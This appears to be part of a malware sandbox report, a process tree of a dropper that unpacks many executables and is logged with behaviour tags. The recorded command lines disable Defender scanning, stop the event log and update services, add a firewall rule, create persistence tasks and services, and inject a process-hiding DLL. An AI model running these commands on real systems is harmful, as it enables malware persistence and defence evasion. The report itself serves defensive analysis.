  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3044
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:4608
- - C:\Users\Admin\AppData\Local\Temp\1000609001\stan.exe
    "C:\Users\Admin\AppData\Local\Temp\1000609001\stan.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetWindowsHookEx
    PID:4076
- - C:\Users\Admin\AppData\Local\Temp\1000639001\moto.exe
    "C:\Users\Admin\AppData\Local\Temp\1000639001\moto.exe"
    3⤵
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:4812
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "FLWCUERA"
      4⤵
      Launches sc.exe
      PID:4192
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\1000639001\moto.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4392
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:2148
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "FLWCUERA"
      4⤵
      Launches sc.exe
      PID:1956
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:4472
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3768
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "FLWCUERA" binpath= "C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:456
- - C:\Users\Admin\AppData\Local\Temp\1000640001\crypted.exe
    "C:\Users\Admin\AppData\Local\Temp\1000640001\crypted.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:4140
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:4348
- - C:\Users\Admin\AppData\Local\Temp\1000641001\2024.exe
    "C:\Users\Admin\AppData\Local\Temp\1000641001\2024.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3804
- - C:\Users\Admin\AppData\Local\Temp\1000642001\alex.exe
    "C:\Users\Admin\AppData\Local\Temp\1000642001\alex.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    PID:4768
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:2628
    - - C:\Users\Admin\AppData\Roaming\configurationValue\Logs.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\Logs.exe"
        5⤵
        
        PID:4620
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5376
    - - C:\Users\Admin\AppData\Roaming\configurationValue\olehps.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\olehps.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2324
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
        5⤵
        
        PID:4944
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:4184
- - C:\Users\Admin\AppData\Local\Temp\1000644001\leg221.exe
    "C:\Users\Admin\AppData\Local\Temp\1000644001\leg221.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2736
- - C:\Users\Admin\AppData\Local\Temp\1000645001\latestrocki.exe
    "C:\Users\Admin\AppData\Local\Temp\1000645001\latestrocki.exe"
    3⤵
    PID:4176
  - - C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe
      "C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2876
    - - C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
        
        C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2408
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
        6⤵
        
        PID:3192
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        7⤵
        
        PID:5652
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
        7⤵
        Creates scheduled task(s)
        
        PID:6020
    - - C:\Users\Admin\AppData\Local\Temp\nsmA376.tmp
        
        C:\Users\Admin\AppData\Local\Temp\nsmA376.tmp
        5⤵
        
        PID:4552
  - - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
      "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1960
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 372
        5⤵
        Program crash
        
        PID:3840
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 388
        5⤵
        Program crash
        
        PID:3032
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 404
        5⤵
        Program crash
        
        PID:5340
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 680
        5⤵
        Program crash
        
        PID:5608
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 728
        5⤵
        Program crash
        
        PID:5688
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 680
        5⤵
        Program crash
        
        PID:5776
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 680
        5⤵
        Program crash
        
        PID:5836
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 752
        5⤵
        Program crash
        
        PID:5908
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 768
        5⤵
        Program crash
        
        PID:4280
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 744
        5⤵
        Program crash
        
        PID:5228
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 716
        5⤵
        Program crash
        
        PID:4604
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 644
        5⤵
        Program crash
        
        PID:4124
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 772
        5⤵
        Program crash
        
        PID:2120
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 872
        5⤵
        Program crash
        
        PID:1940
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 708
        5⤵
        Program crash
        
        PID:5380
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 768
        5⤵
        Program crash
        
        PID:5524
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 708
        5⤵
        Program crash
        
        PID:5008
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 624
        5⤵
        Program crash
        
        PID:5572
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:5592
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 872
        5⤵
        Program crash
        
        PID:4520
    - - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Checks for VirtualBox DLLs, possible anti-VM trick
        Drops file in Windows directory
        Modifies data under HKEY_USERS
        
        PID:4976
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 336
        6⤵
        Program crash
        
        PID:6020
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 352
        6⤵
        Program crash
        
        PID:3192
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 656
        6⤵
        Program crash
        
        PID:5648
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 732
        6⤵
        Program crash
        
        PID:2248
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 736
        6⤵
        Program crash
        
        PID:3612
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:5644
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 724
        6⤵
        Program crash
        
        PID:4444
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 656
        6⤵
        Program crash
        
        PID:4200
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 644
        6⤵
        Program crash
        
        PID:3504
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 364
        6⤵
        Program crash
        
        PID:5752
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        6⤵
        
        PID:4272
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:4480
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:1124
      - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Manipulates WinMonFS driver.
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:4520
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 372
        7⤵
        Program crash
        
        PID:3628
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 388
        7⤵
        Program crash
        
        PID:5328
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 392
        7⤵
        Program crash
        
        PID:6036
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 680
        7⤵
        Program crash
        
        PID:5704
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 728
        7⤵
        Program crash
        
        PID:5848
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 728
        7⤵
        Program crash
        
        PID:5884
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:4788
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 760
        7⤵
        Program crash
        
        PID:3480
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 776
        7⤵
        Program crash
        
        PID:5440
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 768
        7⤵
        Program crash
        
        PID:1980
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        7⤵
        Creates scheduled task(s)
        
        PID:5836
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        7⤵
        
        PID:5568
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:5480
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 748
        7⤵
        Program crash
        
        PID:5872
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 844
        7⤵
        Program crash
        
        PID:2336
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:5788
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 956
        7⤵
        Program crash
        
        PID:1516
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 972
        7⤵
        Program crash
        
        PID:3308
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        7⤵
        Executes dropped EXE
        
        PID:2140
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 928
        7⤵
        Program crash
        
        PID:3532
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        7⤵
        Creates scheduled task(s)
        
        PID:5164
        
        C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        7⤵
        Executes dropped EXE
        
        PID:1680
  - - C:\Users\Admin\AppData\Local\Temp\FirstZ.exe
      "C:\Users\Admin\AppData\Local\Temp\FirstZ.exe"
      4⤵
      Executes dropped EXE
      Drops file in System32 directory
      PID:3024
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5264
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
        5⤵
        Launches sc.exe
        
        PID:5224
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        Executes dropped EXE
        
        PID:2712
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "WSNKISKT"
        5⤵
        Launches sc.exe
        
        PID:4940
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        5⤵
        Launches sc.exe
        
        PID:5936
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "WSNKISKT"
        5⤵
        Launches sc.exe
        
        PID:5596
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5592
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:212
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5632
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5652
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        5⤵
        Launches sc.exe
        
        PID:5788
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        5⤵
        Launches sc.exe
        
        PID:5732
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:5428
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:3348
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:1008
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:2156
  - - C:\Users\Admin\AppData\Local\Temp\rty25.exe
      "C:\Users\Admin\AppData\Local\Temp\rty25.exe"
      4⤵
      Executes dropped EXE
      PID:4196
  - - C:\Users\Admin\AppData\Local\Temp\toolspub1.exe
      "C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious behavior: EnumeratesProcesses
      PID:4320
- - C:\Users\Admin\AppData\Local\Temp\1000643001\rdx1122.exe
    "C:\Users\Admin\AppData\Local\Temp\1000643001\rdx1122.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:4472
- - C:\Users\Admin\AppData\Local\Temp\1000646001\MRK.exe
    "C:\Users\Admin\AppData\Local\Temp\1000646001\MRK.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    PID:2840
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:5396
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5396 -s 1176
        5⤵
        Program crash
        
        PID:5888
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:5376
- - C:\Users\Admin\AppData\Local\Temp\1000647001\installs.exe
    "C:\Users\Admin\AppData\Local\Temp\1000647001\installs.exe"
    3⤵
    PID:2712
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2712 -s 312
      4⤵
      Program crash
      PID:5764
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    PID:1520
- - C:\Users\Admin\AppData\Local\Temp\1000648001\fsdfsfsfs.exe
    "C:\Users\Admin\AppData\Local\Temp\1000648001\fsdfsfsfs.exe"
    3⤵
    PID:3940
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5192
- - C:\Users\Admin\AppData\Local\Temp\1000649001\sadsadsadsa.exe
    "C:\Users\Admin\AppData\Local\Temp\1000649001\sadsadsadsa.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:5244

C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
1⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4852
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:3808
- C:\Windows\system32\conhost.exe
  conhost.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1756

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5112

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\qemu-ga.exe
"C:\Users\Admin\AppData\Local\Temp\d887ceb89d\qemu-ga.exe"
1⤵
- Executes dropped EXE
PID:4916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4320 -ip 4320
1⤵
PID:4156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4320 -s 348
1⤵
- Program crash
PID:828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 288
1⤵
- Program crash
PID:4964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4552 -ip 4552
1⤵
PID:1420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1960 -ip 1960
1⤵
PID:4480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1960 -ip 1960
1⤵
PID:5164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1960 -ip 1960
1⤵
PID:3776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1960 -ip 1960
1⤵
PID:5580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1960 -ip 1960
1⤵
PID:5660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2712 -ip 2712
1⤵
PID:5724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1960 -ip 1960
1⤵
PID:5740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1960 -ip 1960
1⤵
PID:5816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5396 -ip 5396
1⤵
PID:5856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1960 -ip 1960
1⤵
PID:5872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1960 -ip 1960
1⤵
PID:776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1960 -ip 1960
1⤵
PID:736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1960 -ip 1960
1⤵
PID:4404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1960 -ip 1960
1⤵
- Executes dropped EXE
PID:4552

C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1960 -ip 1960
1⤵
PID:448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1960 -ip 1960
1⤵
PID:864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1960 -ip 1960
1⤵
PID:5232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1960 -ip 1960
1⤵
PID:316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1960 -ip 1960
1⤵
PID:5548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1960 -ip 1960
1⤵
PID:5444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1960 -ip 1960
1⤵
- Executes dropped EXE
PID:4176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4976 -ip 4976
1⤵
PID:2952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4976 -ip 4976
1⤵
PID:5224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4976 -ip 4976
1⤵
PID:6028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4976 -ip 4976
1⤵
PID:5892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4976 -ip 4976
1⤵
PID:2144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4976 -ip 4976
1⤵
PID:4608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4976 -ip 4976
1⤵
PID:6136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4976 -ip 4976
1⤵
PID:3840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4976 -ip 4976
1⤵
PID:5952

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
- Modifies Windows Firewall
PID:4720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4520 -ip 4520
1⤵
PID:5316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4520 -ip 4520
1⤵
PID:5196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4520 -ip 4520
1⤵
PID:5816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4520 -ip 4520
1⤵
PID:5676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4520 -ip 4520
1⤵
PID:1516

C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:228
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
